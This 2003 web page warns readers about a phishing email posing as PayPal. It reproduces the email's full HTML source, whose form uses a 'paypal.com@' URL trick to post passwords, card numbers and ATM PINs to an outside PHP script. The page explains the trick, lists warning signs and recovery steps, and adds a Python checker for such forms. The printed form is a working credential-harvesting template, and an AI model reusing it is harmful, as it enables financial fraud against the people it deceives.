PayPal Scam
The following is VERY important information regarding a scam that is circulating
around the Internet. I have personally received these emails soliciting private
data in order to prevent my PayPal account from expiring. This page exposes this scam
and shows you how not to fall victim to it.
The Email Message
First things first, the image below is an actual email I received claiming to be
from PayPal:
This is actually a rather good imitation -- not only do the graphics look like PayPal
graphics -- they ARE PayPal graphics because the images are being downloaded from PayPal's site.
The rest was good work done to match PayPal's normal font and even add a standard disclaimer
that even links to PayPal. So, did this email really come from PayPal?
To find the answer, let's look at the email source:
Received: from compuserve.com [210.111.64.85] by (edit: my.local.mailserver.com)
(SMTPD32-7.15) id AFD34E00088; Fri, 08 Aug 2003 19:26:59 -0500
Date: Sat, 09 Aug 2003 09:31:04 +0000
From: Lg5afei692 <lg5afei692@paypal.com>
Subject: Dear PayPal Customer
To: Mail <mail@mydomain.com>
References: <6821E52G438LB2CI@mydomain.com>
In-Reply-To: <6821E52G438LB2CI@mydomain.com>
Message-ID: <JFH5C141ILDL1485@paypal.com>
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-RCPT-TO: <mail@mydomain.com>
Status: U
X-UIDL: 312892327
<html>
<head>
<STYLE type=text/css>
.dummy {}
BODY, TD {font-family: verdana,arial,helvetica,sans-serif;font-size: 13px;
color: #000000;}
UL {list-style: square}
.pp_big {font-family: verdana,arial,helvetica,sans-serif;font-size:
24px;font-weight: bold;color: #003366;}
.pp_sortofbig {font-family: verdana,arial,helvetica,sans-serif;font-size:
22px;font-weight: bold;color: #003366;}
.pp_heading {font-family: verdana,arial,helvetica,sans-serif;font-size:
18px;font-weight: bold;color: #003366;}
.pp_subheading {font-family: verdana,arial,helvetica,sans-serif;font-size:
16px;font-weight: bold;color: #003366;}
.pp_sidebartext {font-family: verdana,arial,helvetica,sans-serif;font-size:
11px;color: #003366;}
.pp_mediumtextbold {font-family: verdana,arial,helvetica,sans-serif;font-size:
14px;font-weight: bold;color: #000000;}
.pp_smalltext {font-family: verdana,arial,helvetica,sans-serif;font-size:
10px;font-weight: normal;color: #000000;}
.pp_smallbluetext {font-family: verdana,arial,helvetica,sans-serif;font-size:
10px;font-weight: normal;color: #003366;}
.pp_footer {font-family: verdana,arial,helvetica,sans-serif;font-size:
11px;color: #aaaaaa;}
</STYLE>
<title>PayPal</title>
</head>
<body>
<table width="600" cellspacing="0" cellpadding="0" border="0" align="center">
<tr>
<td><A href="https://www.paypal.com/"><
IMG src="http://www.paypal.com/images/paypal_logo.gif" width=109
height=35 alt="PayPal" border="0" vspace=10></A>
</td>
</tr>
</table>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tr>
<td background="http://www.paypal.com/images/bg_clk.gif"
width="100%"><img
src="http://www.paypal.com/images/pixel.gif" height="29" width="1" border="0"
></td>
</tr>
<tr>
<td><img src="http://www.paypal.com/images/pixel.gif" height="10"
width="1" border="0"></td>
</tr>
</table>
<table width="600" cellspacing="0" cellpadding="5" border="0" align="center">
<tr>
<td class="pp_sortofbig" align=center>Dear PayPal Customer</td>
</tr>
<tr>
<td valign="top"><p> </p>
<p>This e-mail is the notification of recent innovations taken by PayPal to
detect inactive
customers and non-functioning mailboxes.</p>
<p>The inactive customers are subject to restriction and removal in the next
3 months.</p>
<p>Please confirm your email address and credit card information by logging
in to your PayPal account
using the form below:</p></td>
</tr>
<tr>
<td align=center>
<form
action="http://www.paypal.com@pitstylehomepage.port5.com/000pp.php" method="get">
<p style="margin-left: 4; margin-top: -2; margin-bottom: 0"> </p>
<table border="0">
<tr>
<td><b style="font:bold 8pt">Email Address:</b></td>
<td><input name="lgn" type="text" size="30"
maxlength="32"></td>
</tr>
<tr>
<td><b style="font:bold 8pt">Password:</b></td>
<td><input name="psw" type="password" size="30"
maxlength="32"></td>
</tr>
<tr>
<td><b style="font-style: normal; font-variant: normal; font-weight:
bold; font-size: 8pt">Full Name: </b></td>
<td><input name="full_name" type="text" size="30"
maxlength="32"></td>
</tr>
<tr>
<td><b style="font-style: normal; font-variant: normal;
font-weight: bold;
font-size: 8pt">Credit Card #: </b></td>
<td><input name="cc" size="30" maxlength="30"></td>
<tr>
<td><b style="font-style: normal; font-variant: normal;
font-weight: bold;
font-size: 8pt">Exp.Date(mm/yyyy): </b></td>
<td><input name="exp_date" size="30" maxlength="7"></td>
<tr>
<td><b style="font:bold 8pt: normal; font-variant: normal;
font-weight: bold;
font-size: 8pt">ATM PIN (<font color=red>For Bank
Verification</font>) #: </b></td>
<td><input name="pin" type="password" size="30" maxlength="4"></td>
</tr>
</table>
<p>
<input name="ID" type="hidden" size="30" maxlength="32" value="n8h4hnew">
<input type="submit" value=" Log In ">
</p>
</form>
<p><br>
<span class="pp_smalltext">This notification expires
September 31, 2003</span>
</p></td>
</tr>
<tr>
<td align=center><br> <strong>
Thanks for using PayPal! </strong><br></td>
</tr>
<tr>
<td><img src="http://www.paypal.com/images/dot_row_long.gif"></td>
</tr>
<tr>
<td class="pp_footer"> This PayPal notification was sent to your mailbox.
Your PayPal account is set up to receive the PayPal Periodical newsletter
and product updates when you create your account. To modify your notification
preferences and unsubscribe, go to
<a href="https://www.paypal.com/PREFS-NOTI">https://www.paypal.com/PREFS-NOTI</a>
and log in to your account. Changes to your preferences may take several
days to be reflected in our mailings. Replies to this email will not be
processed. <br> <br>
Copyright© 2002 PayPal Inc. All rights reserved. Designated trademarks
and brands are the property of their respective owners. </td>
</tr>
</table>
</body></html>
NOTE: I had to reformat the above text a little bit to make viewing this page more attractive.
Ok, I included all that code for the more geeky folks. But the main line of interest is:
<form action="http://www.paypal.com@pitstylehomepage.port5.com/000pp.php" method="get">
Notice where the form in the email posts? The www.paypal.com is just a distraction: in a URL,
anything between http:// and an @ is read as a login name, not as the site, so the form really
gets posted to a PHP script on pitstylehomepage.port5.com. Of course, this address will
be different with each email. Each time the email gets sent out, people complain to the FBI,
PayPal, etc., and within a few hours the site is usually shut down. Of course, this is plenty
of time for several unsuspecting folks to give away valuable information.
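The check described above, as an added example (not part of the original page): Python code that pulls each form out of an HTML email body and reports the host the browser would actually contact, along with the other warning signs in the form. The class and function names and the trimmed SAMPLE_HTML are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: the form from the email above, cut down to what the check reads.
SAMPLE_HTML = """
<form action="http://www.paypal.com@pitstylehomepage.port5.com/000pp.php" method="get">
<input name="lgn" type="text"><input name="psw" type="password">
<input name="cc"><input name="pin" type="password">
<input type="submit" value=" Log In ">
</form>
"""

class FormCollector(HTMLParser):
    """Collects each <form> action; inputs are attributed to the most recently opened form."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "inputs": []})
        elif tag == "input" and self.forms:
            kind = (a.get("type") or "text").lower()
            self.forms[-1]["inputs"].append((a.get("name"), kind))

def audit_form(form):
    """Return (real_host, findings) for one collected form."""
    url = urlsplit(form["action"])
    findings = []
    if url.username is not None:
        # Text before '@' is userinfo; the browser connects to url.hostname.
        findings.append(f"userinfo '{url.username}' hides real host '{url.hostname}'")
    if url.scheme != "https":
        findings.append(f"submits over '{url.scheme}', not https")
    secrets = [name or "(unnamed)" for name, kind in form["inputs"] if kind == "password"]
    if secrets:
        findings.append("collects secrets: " + ", ".join(secrets))
    return url.hostname, findings

def audit_email_html(html):
    parser = FormCollector()
    parser.feed(html)
    return [audit_form(f) for f in parser.forms]

if __name__ == "__main__":
    for host, findings in audit_email_html(SAMPLE_HTML):
        print("form posts to:", host)
        for finding in findings:
            print("  -", finding)
```
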
Will the Real PayPal please stand up?
One of the reasons this scam is so well done and works wonderfully to trick so many is its
likeness to a real PayPal email notice. They use all the same fonts, style of writing,
and they even pull graphics from the PayPal site. Yep, they didn't bother copying the
graphics of PayPal -- they used them directly. In addition, this email even contains the
very familiar disclaimer message (that part of the email we usually don't bother reading
anymore) that says you are receiving this email because you are subscribed to PayPal's
services -- very typical stuff -- they probably just copied it from an actual PayPal
newsletter email. If it looks like a duck, walks like a duck, quacks like a duck -- it
still might be a scam.
What tipped me off that this wasn't a real PayPal email was the content. Really look at
the email. Would PayPal send out an email requiring people to submit
data from an unsecured email form? It turns out that PayPal never asks for passwords or
bank information by email either. And of course, why would PayPal want my ATM PIN
anyways? The answer is simple: PayPal doesn't need it, but the scammer wants it.
What's at Stake
Well, your online identity for starters. But more importantly, PayPal accounts frequently
have Credit Cards attached to them (great for eBay users) and bank accounts as well. So,
effectively, the scammer could easily waltz into your PayPal account and buy a really cool toy on
eBay. If your account has a positive balance, the scammer could get to that money too. Most
people don't have more than $5 or $10 in the account, so most people use it to pay
folks on eBay with a Credit Card or Bank transfers (EFT).
As you can see, access to your PayPal account could be financially dangerous. This
is why the real PayPal has precautions in place and policies that prevent them
from asking for these types of information in non-secure ways (email, non-SSL webpages, etc).
What to do when you get this Email
Most people will simply delete the email when it comes in. However, I advocate
a more proactive approach. The sooner someone knows about this scam, the sooner
it can be shut down and the fewer people will be taken advantage of.
When you get this email, please tell PayPal about it. Forward the email to:
accessviolation@paypal.com and/or
contact the PayPal Service Team (requires you to log in to PayPal).
Oddly enough, the email address the message was sent to wasn't even registered with PayPal.
What to do if you are a Victim
There are a few things you will need to do:
- Log in to your PayPal account and see if there are any unusual transactions
recently posted.
- Contact your credit card company and/or bank to let them know what has happened. Most
likely, they will issue a fraud alert on your account. All transactions will
be suspect and you may have to call in your new transactions or even be assigned
a new account number.
- Let PayPal know about this; they have a vested interest in the security of
their users. They have many resources about what to do if you fall victim
to scams or fake sites/emails.
- Let the FBI know: Their Internet Fraud Complaint Center is an excellent
resource. To actually file a complaint, go to: http://www1.ifccfbi.gov/cf1.asp.
- Let your friends and family know about this scam -- especially if you know
they have a PayPal account or do a lot of eBay business.
These things are not the only measures you can take, but they should at least be
your first ones. Don't let pride get in the way! Several folks have been taken
by this one. This scam is especially convincing because it looks just like a legit
email from PayPal, right down to the disclaimer.
Resources and News Links
A few links to help you research this more. Don't just take my word for it.
In addition, you can search a major search engine (like Google) for PayPal scam and see
what kind of results you get.
Final Remarks
This is not the first and only scam on PayPal users and
this is not the only technique used. Other scams may involve going to another website
(non-PayPal) and entering information there. Also, this type of scam is not
limited to PayPal users, but also affects eBay, major online retailers, and large ISPs. Always
be skeptical of requests for information by email or sent in non-secure ways.
Hopefully, this page will prevent someone from making a very costly mistake
in the future.